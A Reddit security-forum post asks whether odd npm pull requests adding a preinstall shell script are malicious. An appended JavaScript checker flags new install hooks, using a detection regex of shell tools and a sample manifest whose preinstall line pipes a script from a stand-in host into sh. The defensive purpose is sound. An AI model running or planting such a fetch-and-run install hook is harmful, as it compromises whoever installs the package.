Random pull request on public JS project repos using NPM
Jan. 1, 2023, 8:19 a.m. | /u/bitingstack
cybersecurity www.reddit.com
He's opening and closing pull requests (like [this one](https://github.com/deliveroo/merge-pr-to-branch/pull/38)) on projects using NPM, with "test" file changes on `.gitignore` and `package.json`.
[One PR](https://github.com/npm/statusboard/pull/616/files) seems to have a shell access preinstall script? [screenshot](https://imgur.com/4VV9aKG)
Is this malicious? If it is, does anybody know which CVE this is?
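A reviewer-side check for the kind of change the post describes, as an added example that is not part of the original post or of either linked project: it compares the base-branch `package.json` with the one in a pull request and reports install-time lifecycle scripts that the PR adds or modifies. The function names, the keyword heuristic and the sample manifests are assumptions made for illustration.

```javascript
// Added example: report install-time lifecycle scripts that a pull request adds
// or changes in package.json. Hook names are npm's lifecycle scripts that run
// during `npm install`; the sample manifests at the bottom are constructed.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic only (an assumption, not an exhaustive list): commands that fetch
// or execute something outside the repository deserve a manual look.
const SUSPICIOUS = /\b(curl|wget|nc|ncat|bash|sh|powershell|node\s+-e|eval)\b/i;

function parseScripts(manifestText) {
  let manifest;
  try {
    manifest = JSON.parse(manifestText);
  } catch (err) {
    throw new Error("package.json is not valid JSON: " + err.message);
  }
  const scripts = manifest && manifest.scripts;
  // A missing or malformed "scripts" field means no hooks are defined.
  return scripts && typeof scripts === "object" && !Array.isArray(scripts) ? scripts : {};
}

function reviewInstallHooks(baseText, headText) {
  const base = parseScripts(baseText);
  const head = parseScripts(headText);
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const before = typeof base[hook] === "string" ? base[hook] : null;
    const after = typeof head[hook] === "string" ? head[hook] : null;
    if (after === null || after === before) continue; // removed or unchanged
    findings.push({
      hook,
      change: before === null ? "added" : "modified",
      command: after,
      suspicious: SUSPICIOUS.test(after),
    });
  }
  return findings;
}

// Constructed sample input: base branch vs. pull request head.
const baseManifest = JSON.stringify({ name: "demo", scripts: { test: "jest" } });
const headManifest = JSON.stringify({
  name: "demo",
  scripts: { test: "jest", preinstall: "curl https://example.invalid/setup.sh | sh" },
});

console.log(reviewInstallHooks(baseManifest, headManifest));
```

Any finding is a reason to read the script before running `npm install` on the branch; `npm install --ignore-scripts` skips lifecycle scripts while the change is being reviewed.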